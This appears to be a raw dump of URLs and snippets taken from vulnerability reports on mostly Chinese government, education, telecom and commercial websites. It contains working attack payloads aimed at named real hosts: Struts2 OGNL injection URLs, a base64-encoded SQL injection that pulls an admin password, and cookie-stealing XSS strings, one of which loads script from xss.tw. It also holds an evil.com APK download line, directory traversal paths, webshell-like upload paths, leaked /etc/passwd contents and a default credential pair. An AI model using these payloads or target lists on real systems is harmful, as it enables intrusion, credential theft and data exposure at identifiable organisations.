http://stmp.moe.edu.cn/user!login.do http://www.hnssft.gov.cn/mailbox/MailBox/save.do http://www.chinasi.org.cn/index.action http://zone.wooyun.org/content/44 http://elearning.teacher.com.cn/cms/detail/index.action http://hengshan.jixi.gov.cn/ http://211.142.5.188:8064/activ/mobilZone/zmydAction!list.action;jsessionid=8FDD198834222B93F79A094692CDC1E0 http://www.dachan.com/index.action http://www.sd.10086.cn/wlan/hot_spot!query.action http://gdcnc.voole.com/movie.action http://www.rzlanshan.gov.cn/news_show_index.php?id=1110424338 url:http://video.liba.com/detail.php?f_id=3 http://www.baison.com.cn/icrm/club/web/?app_act=qing/qing/index&id=263 http://www.baison.com.cn/icrm/club/web/?app_act=qing/qing/index&id=263 www.aoshitang.com http://mail.gsedu.gov.cn/admin/ http://bbs.360safe.com/forum.php?mod=viewthread&tid=2118854&pid=15047210&page=8&extra=#pid15047210 http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://www.tba.gov.cn/ http://www.tba.gov.cn/news/ view-source:http://yuyue.shdc.org.cn/User/cardinfo.aspx?uid=83967 http://brand.liba.com/image_info.php?groupId=0141318011629&tabId=38&albumId=43&imageId=275 http://brand.liba.com/details.php?groupId=010205257&eventId=59 http://brand.liba.com/group.php?groupId=0141318011629&tabId=41 http://brand.liba.com/phpinfo.php http://brand.liba.com/admin/login.php http://magazine.echinatobacco.com/admin/ http://mail.quanjude.com.cn:8080/gw/admin/ http://group.gd10010.cn/productInfo/product_showProductDetail.do http://www.thedream.cc http://www.thedream.cc/.bash_history http://www.36.cn/corpGlory/page/201210/register.do http://devicetracker.asus.com/select_lang.action http://devicetracker.asus.com/guige.jsp http://i.liba.com/.svn/entries https://www.chinagpay.com/bj/ https://www.chinagpay.com/sh/ http://www.tzpay.cn/moreBusiness_p.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D https://www.yemadai.com/deposit/toDeposit.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://123.196.114.89:8080/dzzwywt/initAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://xxxx/webmail/fileshare.php?inmail=1&file=MScgdW5pb24gc2VsZWN0IDEsMiwzLDQsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHdlYl91c3Igd2hlcmUgdXNyX25hbWU9J2FkbWluJyksNiw3LDgsOSwxMCwxMSwxMiwxMywxNCM= http://mail.comingchina.com/webmail/fileshare.php?file=MTEzMycgYW5kIHNsZWVwKDEwKT4wIw http://xxxx/webmail/info.php http://www.wepaychina.com/login/forgetPwd.action http://www.nongxinyin.com/member.asp?ID=207%5C http://3gbuilder.mobc.cn/zghyw/index.action http://www.zhwyd.com/index.action http://creditcard.ecitic.com/source/.svn/entries svn://22.104.2.107/%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E5%B9%B3%E5%8F%B0/%E7%BD%91%E7%AB%99%E5%8A%A8%E6%80%81%E5%8C%96/07%20%E6%BA%90%E4%BB%A3%E7%A0%81/branches/v1.0_20120809/WebRoot/source svn://22.104.2.107/%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E5%B9%B3%E5%8F%B0 svn:special svn:externals svn:needs-lock http://www.westsec.com.cn/findProfitById.action?Pid=9 http://www.lichuan.gov.cn/jact/admin/login/login.action http://baike.baidu.com/create/%27%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cimg%3E%27%27%27%27&enc=gbk http://www.indunet.net.cn/news/data!newslook.action http://nbsw.yundasys.com/www/fuwuwangdian_list.php?shi=0459 http://nbsw.yundasys.com/kjfs http://nbsw.yundasys.com/tellogin/ http://nbsw.yundasys.com:11324/ztb/login.php http://nbsw.yundasys.com:81/dh/w/login.php http://www.cdswsjd.gov.cn/ws/news_input.action http://123.232.123.23/index.action http://lsjn.zjsgat.gov.cn/zjlsga/lsjn/lookAt1.action http://lsqy.zjsgat.gov.cn/zjlsga/lsqy/lookAt1.action http://www.fzshbx.org/show/news/showDetail.do?tsNews.id=1682 http://www.szjsj.gov.cn/ZhuJian/NewAction_midperson.action http://bm.nbqs.net.cn/qsng-bsp/nb/apply-front!payDesc.action?area=0 http://globalalliancepartners.com/newscontent.action?articleId=2619893 http://www.quamnet.com/viewarticle.action?articleId=2883108&view=NEWS http://www.naggzy.gov.cn/upload!downCurFile.action?curId=228&obId=20111101150313%255BI%406940d4 http://www.yaqcz-168.com/navbarAction!getNavbarRelationInfo.action?ID=khwd http://www.yyxyb.gov.cn/news/news_get.action?id=ff80808138ffd7610139bef9e6780126 http://www.gdcourts.gov.cn/gdcourt/front/front!content.action?lmdm=LM20&gjid=26669 http://www.icelc.org/sh/tabLifecontent!getLifecontentList.action http://appuu.cn/app_detail.do?appId=11025 http://tjsqjw.gov.cn/userLogin.action http://app.mps.gov.cn:8686/clueAction_clueStatement.action http://jipiao.11185.cn/news/newsid!NewsById.a?Id=1200 http://search1.library.sh.cn/mylibrary/user/login.action http://oa.pyzzb.gov.cn/login.action http://www.lqedu.com.cn:8080/UserMgr/login.action http://ncda.xamwsj.gov.cn/login.action?maxFlag=true http://www.fjedu.net.cn/index.action http://www.scdxcfo.net/items/index.action?item_id=17 http://job.bjcsair.com/index.action http://elearning.teacher.com.cn/cms/detail/index.action?project=51&toolsId=2&pageType=project&blockId=2013&toolsContentId=141292 http://invest.heda.gov.cn/index.action http://61.143.0.179:8080/jmroes/civilian/index.action http://glxy.gdut.edu.cn/gllab/index.action http://xian.teacher.com.cn/index.action http://gdjt.ccut.edu.cn/index.action http://zs.nacta.edu.cn/front/sys/search.action http://www.njnhz.gov.cn/app/gxcompany/website/company-info.action?id=334e0c17-c3ea-4fda-b7ee-8b8135c1345f http://www.dywlr.gov.cn/inform-manage.action http://zx.smeln.gov.cn/register.action http://jc.jsspw.gov.cn:8088/website/approve/approveSiteAction!login.action http://wscwh.gaoyou.gov.cn:8060/gyAgriStore/main/login.action http://www.ccom.gov.cn/register.action http://dianzhang.org.cn/index.action http://www.tianjin-air.com/en/login.action http://zcps.tjmec.gov.cn/user!save http://www.gcjs.chaozhou.gov.cn/admin/loginAction!login.action http://djf.baoji.gov.cn/charge/login.action http://518.czstb.gov.cn/foe2013/login/login.action http://dataadmin.baoji.gov.cn/search/qyzhxx/qyzhxx!list.action?fwlxdm=15 http://bjic.baoji.gov.cn/cluster/webSiteInd/findOrgaInfo.action?orgaId=208 http://www.xzwater.gov.cn/hwzwgk/xzxk/action/xzxk!zxsq.action;jsessionid=6F98545E3924A0D9765072645B244314 http://tw.siso.edu.cn/login.action http://sp.gdgn.gov.cn/platform/login!login.action http://beta.teacher.com.cn/logout.action?errorMsg=%E7%94%A8%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81%E9%94%99%E8%AF%AF http://ver.teacher.com.cn/teacher/tools/download/downloadAttachment.action?siteId=5&columnId=45&affixId=3931&id=53941 http://elearning.teacher.com.cn/cms/detail/articleDetail.action?project=372&toolsId=5&toolsContentId=1241&pageType=project&blockId=2015 http://jsjx.xmhcedu.gov.cn/tdesktop/login.action http://ecampus.lssh.tp.edu.tw/ecampus/Login.action http://hsddx.hznu.edu.cn:8080/HSPARTY/mainIndex!show.action?id=232 http://scebm.bda.edu.cn/Qtbm!detail.action?fSpecialtyId=201206141109331771 http://www.gdim.org.cn/ums/login.action http://mhkj.shmh.gov.cn/kjzc/login!welcome.do http://123.232.123.23/index.action http://digital.zjgws.gov.cn/ZJGHEALTH/login_news.action http://www.szwsj.gov.cn/indexAction_deptIndex.action?menuId=032E41EC-12EA-4E9E-B307-32B1D7D23CEC http://res.snedu.com/ERMP/getRestable.do?restableId=61000000110000754998 http://www.yxhouse.net/tbs/showestatetext.action?estateId=1513&&newsCount=18&&isR=1 http://sfzb.gzlo.gov.cn/sfzb/file.do?fileId=2C9089253E8D8D31013F0E6CF8130016 http://www.fsgjj.gov.cn/article.do?id=5e5e5e813f9dc331013f9e0bd19d0c4d http://572.i12371.cn/information/infoOneDetail.action?infoId=40288153363e15c701363e89ccd1074f&partCode=0007&orgId=572&pageCode=ORGMAINPAGE¶m=%25E6%259F%25A5%25E7%259C%258B%25E6%2596%2587%25E7%25AB%25A0 http://1143.i12371.cn/information/infoOneDetail!infoOneDetail.action?infoId=4028815335ae5cd40135bc860d0d185c&partCode=0010¶m=%25E5%25B7%25A5%25E4%25BD%259C%25E5%258A%25A8%25E6%2580%2581,%25E6%259F%25A5%25E7%259C%258B%25E6%2596%2587%25E7%25AB%25A0 http://www.i12371.cn/article/article-personpage.action?id=402881533d54ddf3013d5c846fbb5146 http://www.sdcqjy.com/column.action?exid=ZS01000005 http://www.ypjt.sh.cn/website/noticeAction!toList.action http://www.jsiu.net/jsiu/details.do?article.id=538 http://110.17.162.183:8081/btcjscorp!viewzg.do?js_corp.id=2174 http://zqfdc.net/union/doSMDetail.do?id=b39a1a9c60ec408da4d00d70f88ec62f http://61.133.195.246/dctf/sysSwReport/Com_show.do?id=381&siteType=0 http://www.ebchina.org.cn/HomePageIn/showMessage.action?id=101 http://www.gzrea.cn/download.action?id=527 http://218.76.254.228:8080/btc_ningyuan_hy/usersystem!registerContract.action http://www.sxzz.hbnu.edu.cn/FrontAction_show.action?news.id=1333 http://pt.hxpxw.net/login/login.init.do?returnUrl=http%3A%2F%2Fpt.hxpxw.net%2Felos%2Fhtml%2Findex.init.do&elnScreen=1366*768elnScreen http://123.232.28.35:8081/QZJ2012/login.action http://blog.asedu.com.cn/go.action?loginName=wangwei2007 http://www.hnep.gov.cn:82/wssb/download.action?serid=673&caseid=1304070300510001 http://www.hsgx.gov.cn/findByIdqNews.action?id=102 http://space.yonyou.com/life.php?ac=companys&op=show&uid=28397 http://store.yonyou.com/robots.txt/.php http://store.yonyou.com/images/201204/thumb_img/409_thumb_G_1334894446503.jpg/.php http://livesupport.ku6.com/admin/create.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:499:499::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin saslauth:x:498:498:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin mysql:x:497:495:MySQL server:/var/lib/mysql:/bin/bash exim:x:93:93::/var/spool/exim:/sbin/nologin zabbix:x:1000:1000:zabbix user:/var/lib/zabbix:/bin/bash http://www.365wos.com/weifuwu.action http://sh.womai.com/Member/UpdateUserCategory.do http://sh.womai.com/Member/DeleteUserCategory.do filetype:do百度和google http://jf.wxcsnmg.com/login/index.action http://pay.duowan.com/listProductAction.action https://payment.yy.com/global/zh_TW/helpDetail.action http://58.83.206.138/business_chat/admin/analysis.jsp?highlight=on http://58.83.206.138/business_chat/admin/schema.jsp http://app.lenovo.com/ https://bsee.detroitmi.gov/PLCWebOnline/plcaccess/login.action https://js.hhs.mt.gov:8445/CCUBSProvider/login.action http://aarhus.cs.washington.edu:8005/login.action http://mk42ws.biology.duke.edu:8012/archiva/security/login.action https://xdrive.kauai.hawaii.edu/xythoswfs/webview/login.action https://stuorg.stuact.uga.edu/Secure/Login.action https://apps.umc.edu/sure/login.action http://online1.bloomfield.edu/skillportfe/login.action http://build.yingkelawyer.com/web.rar http://ipr.yingkelawyer.com/List.asp?id=37 http://bi.ts.gamebean.com/user/userLoginAction http://zxft.ywnews.cn/ftml.php?id=4注射点 http://zxft.ywnews.cn/ftml.php?id=4 http://sh.womai.com/Member/DeleteFavorite.do filetype:action http://218.205.252.16/flyingcity/genaralContent/queryDetail.action http://221.179.131.26/BusinessServer/payment/PaymentAction/paymentList.action http://218.200.212.104:8080/wctour/wap/lfm/article_detail.action http://117.139.87.23:8080/wctour/wap/lfm/article_detail.action http://120.192.246.25:8080/sxwxcsgz/initMapInfoWap.action http://221.182.104.170:9010/articles!loadHelps.action http://211.138.102.131:8083/loginjkdgj.action http://112.5.183.62:88/tax.action http://ls.139mm.cn:8080/jht_wcactive/wap/WapActive/active.do http://218.200.212.104:8080/wctour/wap/lfm/article_detail.action?catalogId=53&articleId=205 http://120.192.246.25:8088/MAKactive/NewHomeWap.action http://218.206.27.200:17071/dc/ums/preIndex.action http://117.139.87.23:8080/wctour/wap/lfm/article_detail.action?catalogId=53&articleId=172 http://www.xmobo.com/website/downloadWu.action https://www.baopay.com/user/helpCenter.action http://123.196.114.89:8080/dzzwywt/km3Action.action?deptId=2 http://ekhui.com/news/Tquestion.action http://www.chejiwang.com/market/help.action http://fm.cjdao.com/help.action?help=ntec http://person.sac.net.cn/pages/yearcheck/tran-hours-out.html http://person.sac.net.cn/pages/yearcheck/yearcheck-position-person.html http://person.sac.net.cn/pages/registration/sac-finish-person.html?rpiId=002388 http://person.sac.net.cn/pages/train/train-line-register-list.html http://person.sac.net.cn/pages/registration/sac-publicity.html http://person.sac.net.cn/pages/registration/sac-publicity-report.html http://person.sac.net.cn/pages/registration/sac-publicity-baodai.html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:497:495:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:496:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin weblogic:x:500:500::/home/weblogic:/bin/bash http://common.51web.com/api/common/PrintAction!list.action http://218.201.14.13 http://chong.changyou.com/common/skip2game.do http://fzj.sz.gov.cn:8080/cms/templates/fzb/fzbDetails.action http://www.2277.com/index.php?r=search/course&k=123 http://wdcx.yundasys.com:11347/p3_system_web/ http://wdcx.yundasys.com:11347/p3_system_web/manage/power/sysuser_login.action http://sxpp.sina.com.cn/school/28 https://login.zhubajie.com/retrieve/index.html?mode=1 https://login.zhubajie.com/ http://xzq.wlj-china.com/12.rar FCKeditor:BasePath FCKeditor:UserFilesPath http://xzq.wlj-china.com/admin_wlj/Index.aspx http://zlgc.jmu.edu.cn/qtxs.asp?bh=503 http://www.bbszxs.com/aaa.php http://www.bbszxs.com/aaa.php?dir=/../../../../../../ http://www.bbszxs.com/bbb.php http://event20.wanmei.com/w2i/w2i5yearstory/w2i5yearstory!commentlist.action?pid=51 http://zone.wooyun.org/content/5156 http://www.nsfocus.net/vulndb/21275 http://www.qqmao.cn/index.action http://61.154.12.191:8083/npld/ http://www.nsbd.cn/ http://adminyun.net/index.action http://wap.huanqiu.com/comment.html http://wcm.ustc.edu.cn/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers http://wcm.ustc.edu.cn/wcm http://localhost/destoon/admin.php?file=admin&action=edit&userid=1 http://localhost/destoon/admin.php?moduleid=1&file=admin http://localhost/destoon/admin.php?moduleid=1&file=admin&action=add http://localhost/destoon/admin.php?file=database http://localhost/destoon/admin.php?file=database&action=process http://localhost/destoon/admin.php?rand=92&file=database&action=execute http://localhost/destoon/admin.php?rand=92&file=database&action=execute http://60years.scut.edu.cn/index.action http://bbs.weiqi.tom.com http://ebiz.cpic.com.cn/ywx/inbuilt.do?method=initInbuiltView&musterId=17538585 http://ebiz.cpic.com.cn/ywx/inbuilt.do?method=queryPolicyInbuiltSingle http://jf.ztgame.com/member?type=sign&page=13 http://www.cdpta.com/netpage/index.do http://www.huawei.com/cn/security/psirt/security-bulletins/security-advisories/hw-u_194647.htm http://www.panpanfood.com/admin/admin.asp http://112.11.131.218/doc/page/login.asp http://220.181.47.151/ guest:admin http://ecc.pku.edu.cn/index.action http://www.wooyun.org/bugs/wooyun-2010-031347/trace/baf4da61c8d7d17a95fee76f7bccca3c http://bmw.womai.com/bmw/user/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin nagios:x:500:500::/home/nagios:/bin/bash www:x:501:501::/home/www:/bin/bash http://software.sfn.cn/ http://software.sfn.cn/data/admin/ver.txt http://software.sfn.cn/data/mysql_error_trace.inc http://software.sfn.cn/sfnadmin/ http://software.sfn.cn/uploads/123.php www.sfn.com.cn localhost:3306 http://idns.sfn.cn/viplogin/vipdomain_regDns.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://z.xywy.com/doc/plus.php?type=appoint&noregist=1&eid=153478 http://electronic.jlu.edu.cn/news.php?id=2387 http://www.xmgs.gov.cn:9090/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers http://www.xmgs.gov.cn:9090/wcm http://www.sm.gov.cn:8080/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers得到帐号和密码 http://www.sm.gov.cn:8080/wcm http://www.zjtax.gov.cn/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers http://www.zjtax.gov.cn/wcm http://www.hbtcepb.gov.cn/ktgl_admin/article_news/admin/news_detail1.asp?id=332 http://www.hbtcepb.gov.cn/ktgl_admin/ http://211.136.107.91:8080/ http://xianguo.com/setting/change-email这个页面,才会发送邮件到新邮箱。 http://xianguo.com/service/submitfav/?link=http:// xss.tw/3132 http://xianguo.com/service/submitfav/?link=http://%22%3E%3C/a%3E%3Cscript%20src=//xss.tw/****%3E%3C/script%3E%3Ca%20%22,然后就可以到邮箱里收邮件啦~ http://rx.cmge.com/hjqstWwwAction!index?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 inurl:registrationForm.action http://new.gfan.com/picring.php?mod=wallpaper&tagid=0 http://new.gfan.com/application.php?mod=dorenrecomment&kyyid=370 http://3g.gfan.com/admin/index.php http://game.gfan.com/admin/index.php http://baoguo.cfpa.org.cn/news.action http://www.51bi.com/space/favor/delMyBFavor.jhtml?id=27250153&status=0 http://218.97.250.37:8088/HKCKSNewsmgr/newsContent_getOneNewsRecord.action?id=721&searchFlag=2 http://www.baison.com.cn/manage/web会员门户管理系统后台 http://www.baison.com.cn/test.php http://star.baison.net/Default2.aspx貌似也存在类似注入问题 http://sales.baison.net:9006/ http://www.tomgroup.com/sql/ ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.wooyun.org;IP=null;IPNum=0 ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.wooyun.org;IP=null;IPNum=0 ext:uc_dw:http://www.evil.com/evil.apk ext:uc_dw:http://fuzzing.duapp.com/evil.txt%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80%E3%80%80.html"/ http://zhidao.zgsj.com/editadmin http://webmail13.189.cn http://pass.tom.com/safeBind.php?action=add1&email2=youremailhere@wooyun.org http://www.goheee.com/admin/menu.htm http://www.kuaidianding.com/diet/bottom_electronicBulletin.action http://www.flysaa.com/cn/zh_cn/home.action?request_locale=zh_cn_CN pplms.cn/v/admin http://nokia-imaging.tom.com.cn/manage/ http://ulehk.beta.ulechina.tom.com/search/get.do http://ulehk.beta.ulechina.tom.com/m.jsp http://223.4.115.110 http://223.4.115.110/jichang.rar http://www.hbhk.com.cn/articleDetail.action http://invoice.skype.tom.com http://www.appchina.com/ http://analytics.tomonline-inc.com/phpmyadmin http://analytics.tomonline-inc.com/doc http://cq.189.cn/mall/user/address(需要登录) http://cq.189.cn/mall/user/address/edit?id=1893 http://cq.189.cn/pay/bestcz.htm http://zone.wooyun.org/index.php?do=action&act=editfield http://m.tom.cn/appweb/book/xiazai.jsp?s=79 http://m.tom.cn/d.jsp?s=12 http://m.tom.cn/d?s=11 http://manhua.7k7k.com/support/wrong.php?vid=198 http://iwatchome.tom.com/WristWatch_paper2.php?talk_id=2191 http://qyqk.chinasafety.gov.cn/ http://tp6.znimg.com//upload//home//201307//2721//e34c97fe6ccf177f.jpg/1.php http://g.gfan.com/admin/index.php?act=login http://wan.tgbus.com/fh/gamekey.php?aid=225176 http://cat.mamabb.com/ http://jzcs.51web.com/news/html/?'405.html http://twdata.nba.tom.com/phpmyadmin/ http://www.shehr.com.cn/teachercapacity/guestbook_detail.php?id=54936 http://lepai.eastmoney.com/Auction/survey.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin aduser:x:500:0::/home/aduser:/bin/bash http://lepai.eastmoney.com/Auction/guige.jsp http://211.136.152.186/ http://211.136.152.186/pplll.asp http://www.ccets.org http://www.ccets.org/images/bank/vip.asp?x=x http://www.fingerage.com/admin/main.html http://218.242.57.205:8087/forum.php http://218.242.57.205:8080/xampp/index.php 